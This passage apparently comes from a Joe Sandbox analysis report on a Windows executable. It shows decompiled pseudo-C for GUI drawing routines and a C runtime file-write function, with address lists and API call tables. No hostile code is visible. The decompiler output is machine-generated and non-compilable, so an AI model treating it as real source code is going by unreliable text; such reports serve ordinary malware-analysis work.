								DrawFrameControl(_t248,  &_v44, 1, (0 |  *(_t250 + 0xf4) != 0x00000002) - 0x00000001 & 0x00000200 | 0x00000001);
							} else {
								if(( *(_t250 + 0x84) & 0x00000080) == 0) {
									_t210 = 4;
								} else {
									_t210 = (0 |  *(_t250 + 0xf4) == 0x00000000) + (0 |  *(_t250 + 0xf4) == 0x00000000) + 1;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x120))))(_t148, _t248, 0x14, _t210,  &(_v80.top), 0);
								if(( *(_t250 + 0x84) & 0x00000080) == 0) {
									_t163 = 4;
								} else {
									_t163 = (0 |  *(_t250 + 0xf4) == 0x00000001) + (0 |  *(_t250 + 0xf4) == 0x00000001) + 1;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x120))))( *((intOrPtr*)(_t250 + 0x11c)), _t248, 0x16, _t163,  &(_v96.bottom), 0);
								if(( *(_t250 + 0x84) & 0x00000080) == 0) {
									_t166 = 4;
								} else {
									_t166 = (0 |  *(_t250 + 0xf4) == 0x00000002) + (0 |  *(_t250 + 0xf4) == 0x00000002) + 1;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x120))))( *((intOrPtr*)(_t250 + 0x11c)), _t248, 0x10, _t166,  &(_v96.top), 0);
							}
							ReleaseDC(_v16, _t248);
							return _v20;
						}
						_v104.x = 0;
						_v104.y = 0;
						GetViewportOrgEx(_t248,  &_v104);
						SetViewportOrgEx(_t248,  *(_t250 + 0x110) + _v120.right, _v120.bottom, 0);
						OffsetRect( &_v120,  ~( *(_t250 + 0x110)), 0);
						 *((intOrPtr*)( *((intOrPtr*)(_t250 + 0x124))))( *(_t250 + 4), _t248,  &_v120);
						SetViewportOrgEx(_t248, _v148.right, _v148.bottom, 0);
						OffsetRect( &_v148,  *(_t250 + 0x110), 0);
						goto L21;
					}
				}
				_t184 =  *((intOrPtr*)(_t250 + 0x124));
				if(_t184 == 0) {
					_push(6);
					_push( &(_v96.bottom));
					goto L8;
				} else {
					_t224 =  *(_t250 + 4);
					 *_t184(_t224, _t248,  &(_v96.bottom));
					goto L9;
				}
			}

0x00412eed
0x00412efd
0x00412f0a
0x00412f0e
0x0041326e
0x0041326e
0x00412f14
0x00412f1b
0x00412f25
0x00412f2d
0x00412f31
0x00412f35
0x00412f39
0x00412f42
0x00412f4c
0x00412f5a
0x00412f64
0x00412f69
0x00412f76
0x00412f9d
0x00412fa8
0x00412faa
0x00412fae
0x00412f9f
0x00412f9f
0x00412fa5
0x00412fa5
0x00412faf
0x00412fb0
0x00412fb6
0x00412fb8
0x00412fbc
0x00412fc0
0x00412fc4
0x00412fd4
0x00412fd5
0x00412fd9
0x00412fdb
0x00412fdd
0x00412fdd
0x00412fe7
0x00412fe8
0x00412fea
0x00412fec
0x00412fee
0x00412fee
0x00413009
0x00413035
0x0041304d
0x0041305b
0x004130f4
0x004130ff
0x00413105
0x004130f6
0x004130f6
0x004130fc
0x004130fc
0x00000000
0x00413061
0x00413067
0x004130e7
0x004130ed
0x00413106
0x00413107
0x0041310d
0x00413116
0x0041311e
0x00413131
0x00413136
0x0041313e
0x004131fa
0x00413211
0x0041321c
0x00413234
0x00413255
0x00413144
0x0041314c
0x0041315f
0x0041314e
0x00413159
0x00413159
0x00413176
0x0041317e
0x00413192
0x00413180
0x0041318c
0x0041318c
0x004131af
0x004131b7
0x004131cb
0x004131b9
0x004131c5
0x004131c5
0x004131e8
0x004131e8
0x0041325d
0x00000000
0x00413269
0x0041306f
0x00413073
0x00413077
0x00413090
0x004130a6
0x004130bc
0x004130cb
0x004130df
0x00000000
0x004130df
0x0041305b
0x00412f78
0x00412f80
0x00412f90
0x00412f96
0x00000000
0x00412f82
0x00412f82
0x00412f8c
0x00000000
0x00412f8c

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 00412EFD
GetWindowDC.USER32(?), ref: 00412F1F
GetWindowRect.USER32(?,?), ref: 00412F42
SetRect.USER32(?,00000000,00000000,?,?), ref: 00412F69
FillRect.USER32(00000000,?,00000005), ref: 00412FB0
SetRect.USER32(?,?,?,?,?), ref: 00413009
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00413035
SetRect.USER32(?,?,00000000,?,?), ref: 0041304D
GetViewportOrgEx.GDI32(00000000,?), ref: 00413077
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00413090
OffsetRect.USER32(?,?,00000000), ref: 004130A6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004130CB
OffsetRect.USER32(?,?,00000000), ref: 004130DF
FillRect.USER32(00000000,?,00000005), ref: 00413107

Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412

DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413211
DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413234
DrawFrameControl.USER32(00000000,?,00000001,-00000001), ref: 00413255
ReleaseDC.USER32(?,00000000), ref: 0041325D

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00416110, Relevance: 27.3, APIs: 18, Instructions: 273window

APIs

GetSysColorBrush.USER32(00000004), ref: 00416150
FillRect.USER32(?,?,00000000), ref: 0041615D
DrawEdge.USER32(00000006,?,00000006,00000002), ref: 004161A4
GetSysColorBrush.USER32(0000001D), ref: 004161B6
FillRect.USER32(?,?,00000000), ref: 004161C3
GetSysColorBrush.USER32(0000000D), ref: 004161CB
FrameRect.USER32(00000000,?,00000000), ref: 004161D8
OffsetRect.USER32(?,00000000,?), ref: 00416228
InflateRect.USER32(?,000000FF,000000FF), ref: 0041625E
GetSysColorBrush.USER32(00000004), ref: 0041626A
FillRect.USER32(?,?,00000000), ref: 0041627B
GetSysColorBrush.USER32(0000000D), ref: 00416283
FrameRect.USER32(00000000,?,00000000), ref: 00416294
GetSysColorBrush.USER32(00000004), ref: 00416321
GetSysColorBrush.USER32(00000010), ref: 0041632B

Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872

Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A

GetMenuItemInfoA.USER32 ref: 00416371
SetBkMode.GDI32(?,00000001), ref: 004163E0
GetSysColor.USER32(?), ref: 00416404

Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,0043347C), ref: 00412A33
Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00415C90, Relevance: 25.9, APIs: 17, Instructions: 371window

APIs

DrawEdge.USER32(?,?,00000006,00000002), ref: 00415CE8
OffsetRect.USER32(?,00000000,?), ref: 00415D68
SetTextColor.GDI32(?,00000000), ref: 00415DED
SetBkColor.GDI32(?,00000000), ref: 00415DFD

Part of subcall function 00412AC0: CreatePatternBrush.GDI32(00000000), ref: 00412B14
Part of subcall function 00412AC0: DeleteObject.GDI32(00000000), ref: 00412B1D

SetBrushOrgEx.GDI32(?,?,?,00000000), ref: 00415E20
FillRect.USER32(?,?,00433504), ref: 00415E2D
SetTextColor.GDI32(?,?), ref: 00415E39
SetBkColor.GDI32(?,?), ref: 00415E45
DeleteObject.GDI32(00433504), ref: 00415E50
DrawEdge.USER32(?,?,?,0000000F), ref: 00415EA4
FillRect.USER32(?,?,00000005), ref: 00415EDA
FillRect.USER32(?,?,00000005), ref: 00415EED

Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872

Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A

GetMenuItemInfoA.USER32 ref: 00415F63
GetSysColor.USER32(-00000004), ref: 00415FCE
FillRect.USER32(?,?,-00000003), ref: 0041601C
SetBkMode.GDI32(?,00000001), ref: 0041604B
OffsetRect.USER32(?,00000001,00000001), ref: 004160BA

Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,0043347C), ref: 00412A33
Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00413BC0, Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 196windowstring

APIs

IsMenu.USER32(?), ref: 00413BD9
UpdateWindow.USER32(?), ref: 00413E2C

Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19

DestroyMenu.USER32(?), ref: 00413C12
GetMenuItemCount.USER32(?), ref: 00413C6C
GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
GetMenuItemInfoA.USER32 ref: 00413D39
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22

Strings

0, xrefs: 00413CBB
,, xrefs: 00413D03
d, xrefs: 00413D2E
Z, xrefs: 00413CF9
, xrefs: 00413DEF

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042D421, Relevance: 23.0, APIs: 15, Instructions: 494
file

C-Code - Quality: 91%

			E0042D421(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				short _v6848;
				long _v6852;
				signed int _v6853;
				long _v6860;
				long _v6864;
				int _v6868;
				long _v6872;
				long _v6876;
				long _v6880;
				long _v6884;
				signed int _v6888;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t209;
				long _t211;
				intOrPtr _t214;
				long _t215;
				intOrPtr _t216;
				long _t217;
				signed int _t225;
				signed int* _t230;
				long _t242;
				long _t245;
				signed int* _t246;
				long _t252;
				long _t253;
				signed int* _t256;
				long _t262;
				long _t263;
				void* _t267;
				long _t271;
				int _t272;
				long _t274;
				void* _t275;
				short _t277;
				void* _t278;
				void* _t282;
				long _t284;
				void* _t286;
				int _t293;
				int _t300;
				void* _t304;
				intOrPtr* _t313;
				long _t314;
				signed int _t315;
				signed short* _t316;
				signed int _t317;
				long _t318;
				signed short* _t319;
				long _t331;
				long _t335;
				long _t337;
				char _t341;
				signed int _t352;
				long _t355;
				void* _t356;
				void* _t357;
				long _t359;
				signed int _t361;
				void* _t362;

				_t350 = __edx;
				_t312 = __ebx;
				L00422C50(0x1ae4);
				_t209 =  *0x4420a4; // 0xdee46dc8
				_v8 = _t209 ^ _t361;
				_t211 = _a8;
				_t355 = _a4;
				_t352 = 0;
				_v6864 = _t211;
				_v6860 = 0;
				_v6868 = 0;
				if(_a12 != 0) {
					__eflags = _t211;
					if(__eflags != 0) {
						_push(__ebx);
						_t313 = 0x443960 + (_t355 >> 5) * 4;
						_t214 =  *_t313;
						_t352 = (_t355 & 0x0000001f) << 6;
						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
						_v6880 = _t313;
						_v6853 = _t322;
						__eflags = _t322 - 2;
						if(_t322 == 2) {
							L6:
							_t322 =  !_a12;
							__eflags =  !_a12 & 0x00000001;
							if(__eflags != 0) {
								L8:
								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
									L0042D2B2(_t322, _t355, 0, 0, 2);
									_t362 = _t362 + 0x10;
								}
								_t215 = L0042DC3B(_t355);
								__eflags = _t215;
								if(_t215 == 0) {
									L45:
									_t325 = 0;
									__eflags = 0;
									goto L46;
								} else {
									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
									if(__eflags == 0) {
										goto L45;
									}
									_t267 = L00425EEB(_t313, _t350, __eflags);
									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
									_t325 = 0;
									__eflags = _t271;
									if(_t271 == 0) {
										L46:
										_t216 =  *_t313;
										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
											__eflags = _t217;
											if(_t217 == 0) {
												L85:
												_v6848 = GetLastError();
												L86:
												__eflags = _v6860;
												if(_v6860 != 0) {
													_t220 = _v6860 - _v6868;
													__eflags = _v6860 - _v6868;
													L97:
													_pop(_t312);
													L98:
													return L00429814(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
												}
												L87:
												__eflags = _v6848;
												if(_v6848 == 0) {
													L91:
													__eflags =  *(_t352 +  *_v6880 + 4) & 0x00000040;
													if(__eflags == 0) {
														L94:
														 *((intOrPtr*)(L004251B8(__eflags))) = 0x1c;
														_t225 = L004251CB(__eflags);
														 *_t225 =  *_t225 & 0x00000000;
														__eflags =  *_t225;
														L95:
														_t220 = _t225 | 0xffffffff;
														goto L97;
													}
													__eflags =  *_v6864 - 0x1a;
													if(__eflags != 0) {
														goto L94;
													}
													_t220 = 0;
													goto L97;
												}
												_t355 = 5;
												__eflags = _v6848 - _t355;
												if(__eflags != 0) {
													_t225 = L004251DE(_v6848);
												} else {
													 *((intOrPtr*)(L004251B8(__eflags))) = 9;
													_t225 = L004251CB(__eflags);
													 *_t225 = _t355;
												}
												goto L95;
											}
											_v6848 = _v6848 & 0x00000000;
											_v6860 = _v6876;
											goto L86;
										}
										__eflags = _v6853;
										_v6848 = _t325;
										if(_v6853 != 0) {
											__eflags = _v6853 - 2;
											if(_v6853 != 2) {
												_v6872 = _v6864;
												__eflags = _a12 - _t325;
												if(_a12 <= _t325) {
													goto L91;
												} else {
													goto L70;
												}
												do {
													L70:
													_v6852 = _v6852 & 0x00000000;
													_t331 = _v6872 - _v6864;
													__eflags = _t331;
													_t230 =  &_v1724;
													_t356 = 2;
													do {
														__eflags = _t331 - _a12;
														if(_t331 >= _a12) {
															break;
														}
														_t350 =  *_v6872 & 0x0000ffff;
														_v6872 = _v6872 + _t356;
														_t331 = _t331 + _t356;
														__eflags = _t350 - 0xa;
														if(_t350 == 0xa) {
															_t315 = 0xd;
															 *_t230 = _t315;
															_t230 = _t230 + _t356;
															_t167 =  &_v6852;
															 *_t167 = _v6852 + _t356;
															__eflags =  *_t167;
														}
														_v6852 = _v6852 + _t356;
														 *_t230 = _t350;
														_t230 = _t230 + _t356;
														__eflags = _v6852 - 0x6a8;
													} while (_v6852 < 0x6a8);
													_t355 = 0;
													asm("cdq");
													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
													__eflags = _t314;
													if(_t314 == 0) {
														goto L85;
													} else {
														goto L76;
													}
													while(1) {
														L76:
														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
														__eflags = _t242;
														if(_t242 == 0) {
															break;
														}
														_t355 = _t355 + _v6876;
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															continue;
														}
														L80:
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															goto L86;
														}
														goto L81;
													}
													_v6848 = GetLastError();
													goto L80;
													L81:
													_t245 = _v6872 - _v6864;
													_v6860 = _t245;
													__eflags = _t245 - _a12;
												} while (_t245 < _a12);
												goto L86;
											}
											_t316 = _v6864;
											__eflags = _a12 - _t325;
											if(_a12 <= _t325) {
												goto L91;
											} else {
												goto L60;
											}
											do {
												L60:
												_v6852 = _v6852 & 0x00000000;
												_t335 = _t316 - _v6864;
												__eflags = _t335;
												_t246 =  &_v6844;
												_t357 = 2;
												do {
													__eflags = _t335 - _a12;
													if(_t335 >= _a12) {
														break;
													}
													_t350 =  *_t316 & 0x0000ffff;
													_t316 = _t316 + _t357;
													_t335 = _t335 + _t357;
													_v6884 = _t316;
													__eflags = _t350 - 0xa;
													if(_t350 == 0xa) {
														_v6868 = _v6868 + _t357;
														_t317 = 0xd;
														 *_t246 = _t317;
														_t316 = _v6884;
														_t246 = _t246 + _t357;
														_t140 =  &_v6852;
														 *_t140 = _v6852 + _t357;
														__eflags =  *_t140;
													}
													_v6852 = _v6852 + _t357;
													 *_t246 = _t350;
													_t246 = _t246 + _t357;
													__eflags = _v6852 - 0x13fe;
												} while (_v6852 < 0x13fe);
												_t355 = _t246 -  &_v6844;
												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
												__eflags = _t252;
												if(_t252 == 0) {
													goto L85;
												}
												_t253 = _v6876;
												_v6860 = _v6860 + _t253;
												__eflags = _t253 - _t355;
												if(_t253 < _t355) {
													goto L86;
												}
												__eflags = _t316 - _v6864 - _a12;
											} while (_t316 - _v6864 < _a12);
											goto L86;
										}
										_t318 = _v6864;
										__eflags = _a12 - _t325;
										if(_a12 <= _t325) {
											goto L91;
										} else {
											goto L49;
										}
										do {
											L49:
											_t359 = 0;
											_t337 = _t318 - _v6864;
											__eflags = _t337;
											_t256 =  &_v6844;
											do {
												__eflags = _t337 - _a12;
												if(_t337 >= _a12) {
													break;
												}
												_t350 =  *_t318;
												_t318 = _t318 + 1;
												_t337 = _t337 + 1;
												_v6884 = _t318;
												__eflags = _t350 - 0xa;
												if(_t350 == 0xa) {
													_v6868 =  &(_v6868->Internal);
													 *_t256 = 0xd;
													_t256 =  &(_t256[0]);
													_t359 = _t359 + 1;
													__eflags = _t359;
												}
												 *_t256 = _t350;
												_t256 =  &(_t256[0]);
												_t359 = _t359 + 1;
												__eflags = _t359 - 0x13ff;
											} while (_t359 < 0x13ff);
											_t355 = _t256 -  &_v6844;
											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
											__eflags = _t262;
											if(_t262 == 0) {
												goto L85;
											}
											_t263 = _v6876;
											_v6860 = _v6860 + _t263;
											__eflags = _t263 - _t355;
											if(_t263 < _t355) {
												goto L86;
											}
											__eflags = _t318 - _v6864 - _a12;
										} while (_t318 - _v6864 < _a12);
										goto L86;
									}
									__eflags = _t355;
									if(_t355 == 0) {
										L15:
										_t272 = GetConsoleCP();
										_t319 = _v6864;
										_v6884 = _t272;
										_v6872 = 0;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L87;
										}
										_v6852 = 0;
										do {
											_t274 = _v6853;
											__eflags = _t274;
											if(_t274 != 0) {
												__eflags = _t274 - 1;
												if(_t274 == 1) {
													L35:
													_t355 =  *_t319 & 0x0000ffff;
													__eflags = _t355 - 0xa;
													_t325 = 0 | _t355 == 0x0000000a;
													_t319 =  &(_t319[1]);
													_t81 =  &_v6852;
													 *_t81 = _v6852 + 2;
													__eflags =  *_t81;
													_v6848 = _t355;
													_v6888 = _t355 == 0xa;
													L36:
													__eflags = _t274 - 1;
													if(_t274 == 1) {
														L38:
														_t275 = L00430224(_t325, _v6848);
														_pop(_t325);
														__eflags = _t275 - _v6848;
														if(_t275 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 2;
														__eflags = _v6888;
														if(_v6888 == 0) {
															goto L42;
														}
														_t277 = 0xd;
														_v6848 = _t277;
														_t278 = L00430224(_t325, _t277);
														_pop(_t325);
														__eflags = _t278 - _v6848;
														if(_t278 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 1;
														_t94 =  &_v6868;
														 *_t94 =  &(_v6868->Internal);
														__eflags =  *_t94;
														goto L42;
													}
													__eflags = _t274 - 2;
													if(_t274 != 2) {
														goto L42;
													}
													goto L38;
												}
												__eflags = _t274 - 2;
												if(_t274 != 2) {
													goto L36;
												}
												goto L35;
											}
											_t341 =  *_t319;
											_t355 = _v6880;
											__eflags = _t341 - 0xa;
											_v6888 = 0 | _t341 == 0x0000000a;
											_t282 =  *_t355 + _t352;
											__eflags =  *(_t282 + 0x38);
											if( *(_t282 + 0x38) == 0) {
												_t284 = L0042DE77(_t341);
												__eflags = _t284;
												if(_t284 == 0) {
													_push(1);
													_push(_t319);
													L25:
													_push( &_v6848);
													_t286 = E00430055();
													_t362 = _t362 + 0xc;
													__eflags = _t286 - 0xffffffff;
													if(_t286 == 0xffffffff) {
														goto L86;
													}
													L26:
													_t319 =  &(_t319[0]);
													_v6852 = _v6852 + 1;
													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
													__eflags = _t355;
													if(_t355 == 0) {
														goto L86;
													}
													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
													__eflags = _t293;
													if(_t293 == 0) {
														goto L85;
													}
													_t325 = _v6868;
													_v6860 = _v6852 + _v6868;
													__eflags = _v6872 - _t355;
													if(_v6872 < _t355) {
														goto L86;
													}
													__eflags = _v6888;
													if(_v6888 == 0) {
														goto L42;
													}
													_v16 = 0xd;
													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L85;
													}
													__eflags = _v6872 - 1;
													if(_v6872 < 1) {
														goto L86;
													}
													_v6868 =  &(_v6868->Internal);
													_v6860 = _v6860 + 1;
													goto L42;
												}
												__eflags = _v6864 - _t319 + _a12 - 1;
												if(_v6864 - _t319 + _a12 <= 1) {
													_t350 =  *_t319;
													_v6860 = _v6860 + 1;
													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
													goto L86;
												}
												_t304 = E00430055( &_v6848, _t319, 2);
												_t362 = _t362 + 0xc;
												__eflags = _t304 - 0xffffffff;
												if(_t304 == 0xffffffff) {
													goto L86;
												}
												_t319 =  &(_t319[0]);
												_v6852 = _v6852 + 1;
												goto L26;
											}
											_t350 =  *((intOrPtr*)(_t282 + 0x34));
											_v16 =  *((intOrPtr*)(_t282 + 0x34));
											_v15 = _t341;
											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
											_push(2);
											_push( &_v16);
											goto L25;
											L42:
											__eflags = _v6852 - _a12;
										} while (_v6852 < _a12);
										goto L86;
									}
									__eflags = _v6853;
									if(_v6853 == 0) {
										goto L46;
									}
									goto L15;
								}
							}
							 *(L004251CB(__eflags)) =  *_t307 & 0x00000000;
							 *((intOrPtr*)(L004251B8(__eflags))) = 0x16;
							_t225 = L00425166();
							goto L95;
						}
						__eflags = _t322 - 1;
						if(_t322 != 1) {
							goto L8;
						}
						goto L6;
					}
					 *(L004251CB(__eflags)) = 0;
					 *((intOrPtr*)(L004251B8(__eflags))) = 0x16;
					_t220 = L00425166() | 0xffffffff;
					goto L98;
				}
				_t220 = 0;
				goto L98;
			}

0x0042d421
0x0042d421
0x0042d42b
0x0042d430
0x0042d437
0x0042d43a
0x0042d43e
0x0042d442
0x0042d444
0x0042d44a
0x0042d450
0x0042d459
0x0042d462
0x0042d464
0x0042d48c
0x0042d48d
0x0042d494
0x0042d499
0x0042d4a2
0x0042d4a4
0x0042d4aa
0x0042d4b0
0x0042d4b3
0x0042d4ba
0x0042d4bd
0x0042d4bf
0x0042d4c2
0x0042d4e1
0x0042d4e1
0x0042d4e6
0x0042d4ef
0x0042d4f4
0x0042d4f4
0x0042d4f8
0x0042d4fe
0x0042d500
0x0042d79f
0x0042d79f
0x0042d79f
0x00000000
0x0042d506
0x0042d508
0x0042d50d
0x00000000
0x00000000
0x0042d513
0x0042d51d
0x0042d52f
0x0042d531
0x0042d537
0x0042d539
0x0042d53b
0x0042d7a1
0x0042d7a1
0x0042d7a3
0x0042d7a8
0x0042da63
0x0042da69
0x0042da6b
0x0042da82
0x0042da88
0x0042da8e
0x0042da8e
0x0042da95
0x0042db09
0x0042db09
0x0042db0f
0x0042db0f
0x0042db10
0x0042db1d
0x0042db1d
0x0042da97
0x0042da97
0x0042da9e
0x0042dacd
0x0042dad5
0x0042dada
0x0042daeb
0x0042daf0
0x0042daf6
0x0042dafb
0x0042dafb
0x0042dafe
0x0042dafe
0x00000000
0x0042dafe
0x0042dae2
0x0042dae5
0x00000000
0x00000000
0x0042dae7
0x00000000
0x0042dae7
0x0042daa2
0x0042daa3
0x0042daa9
0x0042dac5
0x0042daab
0x0042dab0
0x0042dab6
0x0042dabb
0x0042dabb
0x00000000
0x0042daa9
0x0042da73
0x0042da7a
0x00000000
0x0042da7a
0x0042d7ae
0x0042d7b5
0x0042d7bb
0x0042d869
0x0042d870
0x0042d949
0x0042d94f
0x0042d952
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d958
0x0042d958
0x0042d95e
0x0042d965
0x0042d965
0x0042d96d
0x0042d973
0x0042d974
0x0042d974
0x0042d977
0x00000000
0x00000000
0x0042d97f
0x0042d982
0x0042d988
0x0042d98a
0x0042d98d
0x0042d991
0x0042d992
0x0042d995
0x0042d997
0x0042d997
0x0042d997
0x0042d997
0x0042d99d
0x0042d9a3
0x0042d9a6
0x0042d9a8
0x0042d9a8
0x0042d9b4
0x0042d9cc
0x0042d9e1
0x0042d9e3
0x0042d9e5
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d9eb
0x0042d9eb
0x0042da0c
0x0042da12
0x0042da14
0x00000000
0x00000000
0x0042da16
0x0042da1c
0x0042da1e
0x00000000
0x00000000
0x0042da2e
0x0042da2e
0x0042da30
0x00000000
0x00000000
0x00000000
0x0042da30
0x0042da28
0x00000000
0x0042da32
0x0042da38
0x0042da3e
0x0042da44
0x0042da44
0x00000000
0x0042da4d
0x0042d876
0x0042d87c
0x0042d87f
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d885
0x0042d885
0x0042d885
0x0042d88e
0x0042d88e
0x0042d896
0x0042d89c
0x0042d89d
0x0042d89d
0x0042d8a0
0x00000000
0x00000000
0x0042d8a2
0x0042d8a5
0x0042d8a7
0x0042d8a9
0x0042d8af
0x0042d8b2
0x0042d8b4
0x0042d8bc
0x0042d8bd
0x0042d8c0
0x0042d8c6
0x0042d8c8
0x0042d8c8
0x0042d8c8
0x0042d8c8
0x0042d8ce
0x0042d8d4
0x0042d8d7
0x0042d8d9
0x0042d8d9
0x0042d8ed
0x0042d90b
0x0042d911
0x0042d913
0x00000000
0x00000000
0x0042d919
0x0042d91f
0x0042d925
0x0042d927
0x00000000
0x00000000
0x0042d935
0x0042d935
0x00000000
0x0042d93e
0x0042d7c1
0x0042d7c7
0x0042d7ca
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d7d0
0x0042d7d0
0x0042d7d2
0x0042d7d4
0x0042d7d4
0x0042d7da
0x0042d7e0
0x0042d7e0
0x0042d7e3
0x00000000
0x00000000
0x0042d7e5
0x0042d7e7
0x0042d7e8
0x0042d7e9
0x0042d7ef
0x0042d7f2
0x0042d7f4
0x0042d7fa
0x0042d7fd
0x0042d7fe
0x0042d7fe
0x0042d7fe
0x0042d7ff
0x0042d801
0x0042d802
0x0042d803
0x0042d803
0x0042d813
0x0042d831
0x0042d837
0x0042d839
0x00000000
0x00000000
0x0042d83f
0x0042d845
0x0042d84b
0x0042d84d
0x00000000
0x00000000
0x0042d85b
0x0042d85b
0x00000000
0x0042d864
0x0042d541
0x0042d543
0x0042d551
0x0042d551
0x0042d557
0x0042d55d
0x0042d565
0x0042d56b
0x0042d56e
0x00000000
0x00000000
0x0042d574
0x0042d57a
0x0042d57a
0x0042d580
0x0042d582
0x0042d6ef
0x0042d6f1
